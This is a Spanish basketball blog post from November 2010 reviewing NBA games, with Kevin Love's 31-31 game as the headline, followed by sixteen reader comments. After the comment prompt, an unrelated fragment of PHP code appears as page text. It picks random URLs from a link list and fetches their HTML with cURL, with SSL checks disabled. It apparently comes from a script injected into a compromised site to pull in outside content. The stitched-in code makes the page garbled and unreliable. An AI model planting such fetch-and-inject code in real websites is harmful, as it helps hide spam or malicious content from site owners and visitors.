La crónica (12/11/2010): El monstruo Love

13 de November de 2010 por TheDeerHunter

Nos levantamos esta mañana y parece que estamos en otra época. El 31-31 que le endosó anoche Kevin Love a los Knicks no lo veíamos desde cuando Moses Malone, Parish o Jabbar vestían de corto. Tal hazaña no podía quedar en saco roto y si ya es improbable que suceda en la actualidad no lo es menos que Beasley cuaje 2 buenas actuaciones seguidas. Sucedió y D’Antoni y los suyos se llevaron otra derrota más.

La otra inmensa sorpresa de la jornada fue la derrota de Orlando en manos de Toronto. La segunda consecutiva y en casa. Los de Florida coquetearon con el desastre todo el partido permitiéndoles anotar a sus rivales 30 puntos cuarto sí y cuarto también. Lewis, Duhon, Reddick… llevan mostrando demasiado tiempo un rendimiento lamentable. Sólo los triples de Pietrus (hasta 8 ) les permitieron aguantar con opciones hasta el final cuando un triple de Weems y un robo de Calderón finiquitaron el choque.

Pero tampoco pasa nada, porque si los que tienen que apretar a Orlando en la clasificación de su división son los Hawks pueden estar tranquilos. Anoche se suicidaron contra los Jazz en la 4ª derrota consecutiva. Los libres sentenciaron el partido, en especial los 2 que falló Horford a falta de 7 segundos para el final con empate en el marcador. Golpe muy gordo.

En abierto pudimos disfrutar de la exhibición que nos ofrecieron Durant y Westbrook para doblegar a los Blazers. Partido igualadísimo donde los ataques se impusieron a unas defensas de mucho nivel. Rudy cuajó su mejor actuación, pero falló el triple decisivo. Una lástima.

Repasamos rápidamente el resto de encuentros: Los Clippers, sin Kaman pero con los rookies a todo gas, plantaron cara a Detroit hasta la prórroga. Villanueva cuajó su mejor actuación del año contra el peor equipo de la liga; Los Rockets lograron su segunda victoria sobre Indiana de la mano de un gran Brad Miller; Arenas, Thornton y Wall tuvieron una noche negra contra la defensa de los Bobcats y Gerald Wallace volvió a ser él para su tercera victoria; Por último los Mavs ganaron a los Sixers y los Suns a los Kings.

MVP: El hombre de otros tiempos, Kevin Love. 31 puntos, 31 rebotes y 5 asistencias de regalo. ¿Será casualidad que se lo hiciera a Stoudemire?

Rookie: Anoche punto para Griffin sobre Wall. El ala-pívot de los Clippers jugó sin Kaman a su lado y aguantó al equipo como un campeón, con 18-18 y 4 asistencias.

La sorpresa: El sustituto de Yao, capaz de anotar 23 puntos, 3 de 3 en triples, atrapar 8 rebotes y repartir 5 asistencias. Impecable Brad Miller.

La decepción: Lewis, Duhon, Redick… que nos lo cuente Denise.

El mayor esfuerzo en vano: No sirvió de nada la grandísima actuación de Eric Gordon, Blake Griffin y Eric Bledsoe. Los Clippers se desmoronan.

Comenta

16 comentarios a esta entrada

  1. Fernando Sancho dice:
    #1

    Increíble Love. No sé si recordáis pero en verano, durante el Mundobasket de Turquía, el señor Ramón Trecet, que parece que lo sabe todo, hacía charlas virtuales en marca y podías preguntarle. Entonces, viendo que Love estaba haciendo bastante buen papel, yo le pregunte… señor Trecet, ¿usted cree que Kevin Love puede ser un gran dominador de la pintura en la NBA?

    Y el hombre que se cree que sabe todo, respondió… No, no lo creo. Para eso tendría que comer muchos garbanzos.

    Pues bien, o se ha “jartao” a cocidos madrileños desde septiembre, o es que realmente este tío sí que es muy trabajador, y después en la cancha lo demuestra.

    Por cierto, seguid así con las crónicas, informes y todos los artículos que publicais. Yo ya estoy en quinto de periodismo y la verdad, da gusto leeros. Entro todos los días y me encanta lo que publicais. Saludos

      Citar

  2. busky23 dice:
    #2

    Me levante del sofa,lo veia dentro…pero golpeo en el aro y no quiso entrar,lo siento por Rudy,se lo merecia.
    Menuda bestialidad del amigo Love,CARPANTA!!!!!!!
    Por cierto,36 años,por la mañana fue papa,y horas despues,para celebrarlo les endosa a los Kings 28 puntos, 14 asistencias y 7 rebotes…ese pequeño canadiense llamado Nash…

      Citar

  3. LEmontus dice:
    #3

    Warrick, uno de los mejores ala pivots atacando de la liga (y por tanto del mundo) con sus 13 puntos en 26 minutos con 56 tiros y con un 64% está pidiendo a gritos tener 10 tiros por partido y jugar de titular porque a parte de que se lo merece Turkoglu no va nada con Suns y está en las últimas.

      Citar

  4. Denise dice:
    #4

    Van Gundy Dimisión!!

    Es increible que el peor equipo de la NBA con diferencia, un equipo de mier..da como los Raptors, te ganen en tu propia cancha, y, encima sin contar con los dos jugadores más talentosos (quizás, los únicos del equipo) como Barbosa y Kleiza. Qué el trio Weems-Bargnani-De Rozan te metan 69 puntos es un crimen, un insulto al buen baloncesto.
    Es increible que con sólo dos cambios en el equipo con respecto al año pasado, Barnes por el pufo Quentin, y Anthony Johnson (que ni jugaba) por el pufo Duhon, el equipo juegue tan mal, y la diferencia sea tan abismal respecto al año pasado donde el equipo alcanzó un nivel de juego espléndido (sí, ya lo sé, excepto en el momento clave vs Celtics). ¿El motivo?, Jugadores, alguno de ellos talentosos, pero sin aptitud ni ganas por hacer algo, Sólo salvaría a Howard, Nelson, Bass y Gortat están dando la talla.
    El priemro que habría que largar es a Van Gundy, por qué coj..te empeñas en poner a Duhon como 2º base, J-will ya no es gran cosa pero le da mil vueltas, por qué Ryan Anderson juega tan poco?, por qué mareas a Pietrus y le das minutos cuando te da la gana, y no le haces jugar cuando te da la gana?, cuándo vas a tener clara la rotación? por qué no dejas a Lewis (que es un crack, pero un p….vago), a Redick, y a los dos grandiosos fichajes del verano sin jugar hasta que espabilen?. Van Gundy dimite ya!!!

    PD: 5 partidos esta noche entre equipos del oeste y del este. Resultado: Cuatro victorias para los del Oeste y una para los del Este, una victoria de Pistons ante Clippers donde ganó el equipo menos malo, en este caso los Pistons, donde da pena ver a Prince, Hamilton y McGrady, sobre todo este último, con lo que ha sido, y ahora arrastrandose por las pistas mendigando minutos. McGrady, ten dignidad contigo mismo y retírate.

    Con Kevin Love me pasaba lo mismo que con Marc Gasol. Al principio, lo ves con esas caras de tontos y pinta de paquetes, y te ríes… pero después te llevas la sorpresa de lo buenos que son.

      Citar

  5. Tiago dice:
    #5

    Que fácil es jugar con Nash, gente como Warrick o Frye parecen buenos.

      Citar

  6. -=TheKing=- dice:
    #6

    Tiago tienes toda la razón, pero Nash esta jugando con un ekipo de paquetes, me duele decirlo pero es así, encima le han firmado un contrato para mi excesivo a Frye y a Dudley……. problemas para los suns me lo veo venir. Además Hedo y Childress no estan currandoselo como deberían respecto a sus sueldos…..

    Si NAsh baja físicamente adiós a los SunS.

      Citar

  7. -=TheKing=- dice:
    #7

    Por cierto cómo puede Robin López ser tan mal defensor. Joder con ese cuerpo por lo menos que sus faltas no sean siempre 2+1.

    Amar’e no sabe jugar sin Nash menudo bajón de rendimiento.

      Citar

  8. HeiNeKeN dice:
    #8

    Brutal Kevin Love y ya si Beasley parece que empieza a jugar a baloncesto… igual no les ha salido tan mal la jugada a los Wolves

      Citar

  9. Denise dice:
    #9

    Quizás estoy despistado y andan perdido por alguna franquicia, pero….alguien sabe donde juegan ahora Mbenga y Morrison?

      Citar

  10. Carlos dice:
    #10

    TheKing, qué entiendes tu exactamente por bajón de rendimiento?

    Ha bajando 3 puntos de media, cierto, pero ha subido en 1 los tapones que pone como también se han visto aumentados los robos respecto a la última temporada. Los rebotes han bajado, pero en absoluto de forma significativa y cuenta, además, con un buen porcentaje de triples. No veo yo que el rendimiento haya bajado de forma drástica desde ningún punto de vista.

    La tirria que le teneis a Amare debería ser disimulada un poco mejor…

      Citar

  11. laimbeer4ever dice:
    #11

    Mbenga está en los Hornets y creo que Morrison no tiene equipo por ahora.

      Citar

  12. Busky23 dice:
    #12

    Mbenga juega en los Hornets y Adam Morrison está en los Wizards.

      Citar

  13. TX dice:
    #13

    No, Morrison ahora mismo es agente libre, a última hora decidieron deshacerse de él

      Citar

  14. LEmontus dice:
    #14

    Vamos a ver Tiago Y TheKing por qué os meteis en estos verengenales?? Warrick como bien sabreis, si es que habeis visto algo de suns,entra con la segunda unidad de Phoneix y ¿sabeis quien es el base de esa segunda unidad? Aunque os sorprenda no es Nash es Goran Dragic(que por cierto es un chupón). Teniendo en cuenta que muchísimos de los minutos son junto a Dragic muchos de los puntos son sin Nash en pista.
    Está claro que Nash hace mejor a sus compañeros sobre todo a los pivots.

    Para los rookies por favor ver partidos antes de hablar.

      Citar

  15. -=TheKing=- dice:
    #15

    Carlos cuando digo bajon de rendimiento no hablo de estadística, aquí parece que solo importa la estadística.
    No ataca el aro con fuerza, no abre espacios en la zona, los rivales le empiezan a dejar que tire porque falla más. Muestra una actiud con los compañeros que da pena, parece que solo le interesa llevarse bien con el base, sale al contrataque antes de cerrar el rebote para ver si caza una canasta facil, si el equipo va mal el entrenador le saca para que no se ofusque……….. asi desde el 2 partido.

      Citar

  16. -=TheKing=- dice:
    #16

    LEmontus, para decir que Goran es un chuposn mira en las estadísticas que hay dónde se refleja el tiempo que tiene el balón en sus manos comparado con Nash y luego el número de asistencias que da, que está bastante bastante compensado. Además hay que tener en cuenta que Nash esta lanzando muchísimo más, también hay que decir que con acierto. Warrick no sale de títular, pero sí que juega con Nash y si escuchas las declaraciones que hizó nash depués del partido contra Menphis descubrirás lo que dijó Nash respecto a los minutos que juega con Warrick en comparación a los que juegaaba con Stat.

    Y cuando llames rooki a alguien piensa que esa persona podría ya estar trabajando en baloncesto en una epoca en la que tu no habrías ni nacido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>